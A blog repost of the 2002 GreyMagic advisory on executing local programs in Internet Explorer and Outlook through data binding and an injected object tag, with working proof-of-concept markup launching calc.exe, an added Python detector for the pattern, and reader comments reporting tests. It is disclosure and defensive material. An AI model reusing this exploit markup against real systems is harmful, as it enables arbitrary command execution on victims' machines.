Your IE can be *taken out* even without Active Scripting or ActiveX

I know most of you are already sick of these reports about Internet Explorer and Outgļuks holes, but I'm not the one writing them 😉
Those who are interested in how their little IE can be taken through even with Active Scripting or ActiveX disabled can read on; the rest can relax.
Executing arbitrary commands without Active Scripting or ActiveX

GreyMagic Security Advisory GM#001-IE
=====================================

by GreyMagic Software, Israel.
27 Feb 2002.

Topic: Executing arbitrary commands without Active Scripting or ActiveX.

Discovery date: 25 Feb 2002.

Affected applications:
======================

Any application that hosts the WebBrowser control (5.5+) is affected since this exploit does not require Active Scripting or ActiveX. Some of these applications are:

* Microsoft Internet Explorer
* Microsoft Outlook
* Microsoft Outlook Express

Introduction:
=============

In an advisory from Jan 10 2002, "The Pull" demonstrated how it is still possible to use an older bug (initially discovered by Dildog) in the <object> HTML element to run arbitrary commands.

Although "The Pull"'s findings were interesting, his analysis of the re-found bug was erroneous: the problem does not lie within the Popup object; the problem is with dynamically inserted HTML fragments at any point in the document.

All "createPopup" does is create a (featureless) window containing an empty HTML document. This does not pose a threat, but later on that document has HTML injected into it (using innerHTML), which is the actual problem.

For example, the following code will work just the same:

<span id="oSpan"></span>
<script language="jscript" defer>
oSpan.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object>';
</script>

(Note: innerHTML is not the only property used to dynamically insert HTML into an element; it is also possible to use outerHTML, insertAdjacentHTML and more to gain the same results.)

Discussion:
===========

So now that we have identified the origin of the problem, we can search for ways to dynamically insert HTML without using any Active Scripting at all. It then becomes possible to use this bug in more "protected" environments, such as Microsoft Outlook or Internet Explorer with Active Scripting and ActiveX disabled.

One of the exciting features that came along in IE4 was Data Binding; it enables developers to completely separate application data from the presentation layer. The data source objects (DSOs) for Data Binding can be almost anything: CSV files (with the TDC), HTML, XML and many more. Data Binding binds HTML elements (data consumers) such as div or span to the DSO without the need for a single line of script code.

We found out that when the "dataFormatAs" attribute is set to "HTML" on the consumer, Data Binding internally uses innerHTML in order to insert the data into the element (otherwise innerText is used).

So all we need to do now is supply a DSO that contains the offending <object> element; the rest will be done for us by the Data Binding engine, no scripting needed.

Exploit:
========

In the following example we're using an XML data island as our DSO and a span element as the data consumer. Using XML is especially convenient because it can be embedded within the document, without the need for external requests that may be blocked by the host application.

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile"
classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>
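
The advisory's point is that the two halves of the technique are both static markup: a data consumer with dataformatas="html" and a data island carrying an <object> whose codebase names a local executable. The following is an added example, not part of the GreyMagic advisory, showing how a mail gateway or content filter could flag exactly that combination in an HTML body. It uses a small regex tag scanner rather than a full HTML parser (an assumption made for brevity); both sample bodies are constructed for the demo.

```python
import re
from dataclasses import dataclass

# Constructed sample: the advisory's data-binding pattern as it might arrive in an HTML e-mail body.
SAMPLE_BODY = """<html><body>
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile"
classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>
</body></html>"""

# Constructed benign sample: data binding that renders the bound field as text, not HTML.
BENIGN_BODY = """<html><body>
<span datasrc="#oNews" datafld="title"></span>
<xml id="oNews"><items><item><title>Hello</title></item></items></xml>
</body></html>"""


@dataclass
class Finding:
    rule: str
    detail: str


# Opening tags only; "<!" (CDATA markers) and "</" (closing tags) are skipped because
# the first character after "<" must be a letter.
TAG_RE = re.compile(r"<([a-zA-Z][\w:-]*)\b([^>]*)>")
ATTR_RE = re.compile(r"""([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
# Drive letter, UNC path or file: URL in codebase means the "control" is loaded from the local machine.
LOCAL_PATH_RE = re.compile(r"^(?:[a-z]:[\\/]|\\\\|file:)", re.I)


def parse_attrs(attr_text: str) -> dict:
    """Lower-cased attribute name -> value for one tag's attribute text."""
    out = {}
    for m in ATTR_RE.finditer(attr_text):
        out[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return out


def local_codebase_objects(markup: str) -> list:
    """codebase values of <object> tags that point at a local path, wherever they occur (CDATA included)."""
    hits = []
    for m in TAG_RE.finditer(markup):
        if m.group(1).lower() != "object":
            continue
        codebase = parse_attrs(m.group(2)).get("codebase", "")
        if LOCAL_PATH_RE.match(codebase):
            hits.append(codebase)
    return hits


def xml_island(markup: str, island_id: str):
    """Inner markup of <xml id=...>...</xml>, or None if there is no such data island."""
    pat = re.compile(
        r"<xml\b[^>]*\bid\s*=\s*['\"]?" + re.escape(island_id) + r"['\"]?[^>]*>(.*?)</xml>",
        re.I | re.S,
    )
    m = pat.search(markup)
    return m.group(1) if m else None


def scan(markup: str) -> list:
    """Findings for an HTML body: local <object> codebases, and HTML-formatted data binding feeding <object>."""
    findings = [Finding("object-local-codebase", cb) for cb in local_codebase_objects(markup)]
    for m in TAG_RE.finditer(markup):
        attrs = parse_attrs(m.group(2))
        if attrs.get("dataformatas", "").lower() != "html":
            continue
        datasrc = attrs.get("datasrc", "")
        if not datasrc.startswith("#"):
            # Bound to an external DSO we cannot inspect here; worth a look on its own.
            findings.append(Finding("databinding-html-external", datasrc))
            continue
        island = xml_island(markup, datasrc[1:])
        if island is not None and re.search(r"<object\b", island, re.I):
            findings.append(Finding("databinding-html-object", datasrc))
    return findings


if __name__ == "__main__":
    for name, body in (("sample", SAMPLE_BODY), ("benign", BENIGN_BODY)):
        print(name, scan(body))
```

The first rule fires on the <object> itself, regardless of whether it sits in live HTML, a CDATA block or a data island, because the advisory's observation is that the fragment can be inserted from anywhere. The second rule catches the delivery mechanism even if the island's payload were obfuscated past the first rule, which is why both are reported separately.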

Solution:
=========

There is no configuration-tweaking workaround for this bug; it will work as long as the browser parses HTML. The only possible solution must come in the form of a patch from Microsoft.

Tested on:
==========

IE5.5sp2 Win98, all patches, Active scripting and ActiveX disabled.
IE5.5sp2 NT4 sp6a, all patches, Active scripting and ActiveX disabled.
IE6sp1 Win2000 sp2, all patches, Active scripting and ActiveX disabled.
IE6sp1 WinXP, all patches, Active scripting and ActiveX disabled.

Demonstration:
==============

We put together two proof-of-concept demonstrations:

* Simple: attempts to run "c:/winnt/system32/calc.exe".
* Advanced: lets the user pick what they want to run.

They can both be found at http://security.greymagic.com/adv/gm001-ie/.

Feedback:
=========

Please mail any questions or comments to security@greymagic.com.

– Copyright © 2002 GreyMagic Software.
======================================
Write in something tasty and launch anything.

9 thoughts on "Your IE can be *taken out* even without Active Scripting or ActiveX"

  1. K

    Mmmm. Tested it, the calculator launched very nicely for me. This is a very scary hole. Truly.
    configuration:
    browser: ie6 + latest patches
    all the extras: off
    bombard M$ with mails so they make a patch (btw, if you say you don't use IE but some other browser that uses iexplorer's stuff – same thing. Or am I wrong?)

  2. GT

    Tested on W2K and IE6 with all patches. CALC.EXE still didn't launch 🙂 🙁 I figured something was wrong with the computer. Rebooted. Still nothing. Then I remembered that I recently decided to put things in order and work day to day as a Restricted User. Switched myself to Administrators. CALC.EXE launches, what a joy. Switched myself to Standard Users. Launches, the bastard, like...
    Moral. If NT offers the option of being a Restricted User, it's worth using. At least a little safer 🙂 W98 users, of course, get a Chupa Chups.
    P.S. Tested the Pull again. The Pop-Up Exploit doesn't work 🙂 File:{CLSID} works 🙁

  3. Aleksejs

    On 2000/XP you can run Explorer as Guest or a similar user (i.e. with Run As..), and then you get somewhat reasonable security against such "by design features" ((c) M$).
    BTW, are there many who sit under the root account on *NIX all day long? I think far fewer than those who sit on NT/2000/XP as admins.

  4. Yobis

    And what can we do with a launched Windows calculator? As far as I tried, it's not possible to attach any parameters after the exe either! 🙁 and nothing other than an exe could be launched either...
